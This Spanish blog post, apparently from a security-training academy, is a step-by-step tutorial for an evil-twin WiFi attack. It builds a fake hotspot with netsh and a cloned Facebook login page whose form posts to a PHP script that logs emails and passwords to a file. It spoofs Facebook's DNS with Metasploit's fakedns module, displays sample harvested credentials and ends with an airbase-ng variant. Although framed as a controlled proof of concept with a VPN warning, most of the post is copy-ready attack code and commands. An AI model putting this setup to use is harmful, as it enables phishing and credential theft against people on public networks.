Lo mejor del verano es el chiringuito (in)seguro

Publicado por Pedro C. el 12-08-2012

En ésta ocasión, comprobaremos la (in)seguridad de conectarnos a un servicio seguro como facebook desde un punto de acceso público sin contraseña o incluso con ella cuando no está la conexión a páginas importantes securizada por VPN desde nuestro cliente (móvil, portátil, tablet, etc...). Para el entorno de pruebas, se podría haber elegido un paseo marítimo en pleno mes de Agosto, limitando el acceso a tan sólo 100 usuarios, aunque por razones legales, la prueba de concepto la realizaremos en un entorno controlado. Sería increible poder comprobar que a la gente la seguridad no le importa en absoluto. Mejor gratis que seguro... Total, si a mi no me van a hacer nada... Pero, incluso lo que más nos podría sorprender, podría ser ver al camarero del "chiringuito" aun a sabiendas de no tener WIFI en su trabajo, que a lo mejor en su rato de descanso se conectaría al "señuelo" para confiar alegramente sus credenciales a "cualquiera".

Para hacerlo muy sencillo, la infraestructura la hemos montado en un portátil con Microsoft© Windows 7, un móvil para compartir la conexión a Internet, una tarjeta WIFI USB externa, cargador de tipo "mechero" y podríamos tenerlo todo metido en el maletero de un coche excepto la tarjeta inalámbrica para poder ofrecer la mayor cobertura posible si lo fueramos a poner en un paseo marítimo ;-D

Lo primero, es instalar el archiconocido metaesploit (http://www.metasploit.com/) y el WAMP para Microsoft© Windows (http://www.wampserver.com/en/) para poder trabajar con Apache2, PHP y MySQL. Para los propósitos de éste boletín, es tan sólo necesario realizar la instalación con siguiente, siguiente, etc. y finalizar. Fácil, no?

Una vez instalado el WAMP, desde el icono del WAMP Manager iremos a Apache, y luego a httpd.conf; vamos a permitir *todas* las conexiones a Apache desde cualquier interface. Buscaremos la sección <Directory c:/wamp/www/"> y justo antes de la línea </Directory> cambiaremos Allow from 127.0.0.1 por Allow from all. Ahora, le daremos al icono del WAMP Manager otra vez y seleccionaremos Apache, Service, Reiniciar servicio.

Ahora, nos conectaremos a la página de facebook (http://www.facebook.com/) y con el explorador, la guardaremos en el directorio c:\wamp\www con el nombre index.htm

Con nuestro editor de texto favorito, buscaremos la cadena <form id="login_form" action="https://www.facebook.com/login.php?login_attempt=1" method="post" onsubmit="return Event.__inlineSubmit(this,event)"> y la sustituiremos por:

<form id="login_form" action="registra.php" method="post" onsubmit="">

Ahora, crearemos un fichero en c:\wamp\www llamado "registra.php" con el siguiente código:

<?php
 $fichero = fopen("pescados.txt", "a");
 $username = "Usuario: ". $_POST["email"] ."\n";
 fputs($fichero, $username);
 $password = "Clave: ". $_POST["pass"] ."\n\n---Chiringuito POC by s4ur0n---\n\n";
 fputs($fichero, $password);
 fclose($fichero);
 header("Location: http://66.220.153.74"); //ipv4 de facebook sin resolver por DNS
?>
					

Para iniciar el fichero, pondremos date /t > c:\wamp\www\pescados.txt

Con todo lo anterior preparado, vamos a crear un falso punto de acceso con el nombre de cualquier "chiringuito", "hotel", "freewifi", "ayto-wifi" como si lo hubieran puesto para sus clientes. Además, en el SSID pondremos la clave necesaria para poder conectar. Para ello, nos valdremos del "Microsoft Virtual WiFi Miniport Adapter" y que en más de una ocasión, nos servirá de punto de acceso legal para poder compartir conexiones Ethernet/GPRS/3G/4G... con otros equipos. Teneis la documentación completa en http://technet.microsoft.com/en-us/library/dd744890(v=ws.10).aspx

Simplemente, nos dirigimos a Inicio, ejecutar, CMD, clic con el botón derecho del ratón y "Ejecutar como Administrador". Escribiremos:

C:\Windows\System32>cd \
C:\>netsh wlan set hostednetwork mode=allow ssid="CAPITAN COLA key:12345678" key=12345678
					

Ahora, conectaremos con un móvil vía USB que nos dará conectividad a Internet y la compartiremos. El caso es tener conexión a Internet desde el portátil. Aquí hemos usado un iphone conectado por el cable USB y permitiendo desde el mismo "compartir la conexión" (tethering). Procedamos entonces a "compartir" desde Windows 7 su acceso a Internet.

Iremos al "Centro de redes y recursos compartidos", "Cambiar la configuración del adaptador", seleccionaremos el adaptador que vamos a compartir su conexión (Apple Mobile Device Ethernet), clic con el botón derecho y propiedades. Ahora, en la pestaña "Uso compartido" marcaremos la casilla "Permitir que los usuarios de otras redes se conecten..." y en "Conexión de red doméstica" seleccionaremos el nombre de la red del adaptador wifi virtual (Network Wireless Connection 2) o como se llame en el vuestro.

Para activar el nuevo punto de acceso, desde el prompt del sistema, escribiremos:

C:\>netsh wlan start hostednetwork
					

Lo mejor, es que ahora, el punto de acceso virtual tiene siempre en cualquier equipo que se active la IP 192.168.137.1 que Microsoft a elegido para no interferir con las típicas, se ha activado un servidor DHCP para un máximo de 100 clientes y que automáticamente, cuando alguien se conecte, tendrá conectividad a Internet sin tener que tocar nada.

Para falsear el DNS y que redirija cualquier petición a la página de facebook hacia nuestro equipo, abriremos la consola de metaesploit.

C:\metaesploit>dev_msfconsole
					

Usaremos los siguientes comandos:

use auxiliary/server/fakedns
set TARGET ACTION FAKE
set TARGET DOMAIN *.facebook.com
set TARGET HOST 192.168.137.1
run
					

Y simplemente, dejaremos todo funcionando y esperaremos ver quién se ha conectado, si entra en facebook y lo redirige a nuestro "servidor", lo registra y lo manda al correcto olvidándonos del usuario. Podemos ir comprobando con:

C:\>netsh wlan show hostednetwork
					

Una vez transcurridas las pruebas, iremos a comprobar los resultados "pescados"...

C:\>more c:\wamp\www\pescados.txt
12/08/2012
Usuario: madesyp@madesyp.com
Clave: p4ssw0rd_S3gur0!
---Chiringuito POC by s4ur0n---
Usuario: camarero@capitancola.com
Clave: HolaMundo!
---Chiringuito POC by s4ur0n---
...
					

Por la tarde, si hubiera sido en realidad en un paseo marítimo y tras una posible paella en el chiringuito de rigor, se podría realizar con Debian, metaesploit con el fakedns, dhcp (para un servidor DHCP) y con el comando de aircrack-ng 'airbase-ng -P -C 30 -c 6 -e "EL PIRATA" mon0' sin nigún tipo de autenticación y con otras páginas spoofeadas, pero eso será otra historia...

Moraleja: No dejes tus credenciales desde ningún sitio no controlado a no ser que lo hagas con una VPN. Recuerda que en Academia MADESYP nos encontramos impartiendo Cursos especializados en Seguridad Informática donde realizamos y establecemos las contramedidas para las pruebas de concepto.

Buena pesca y no hagais maldades!!!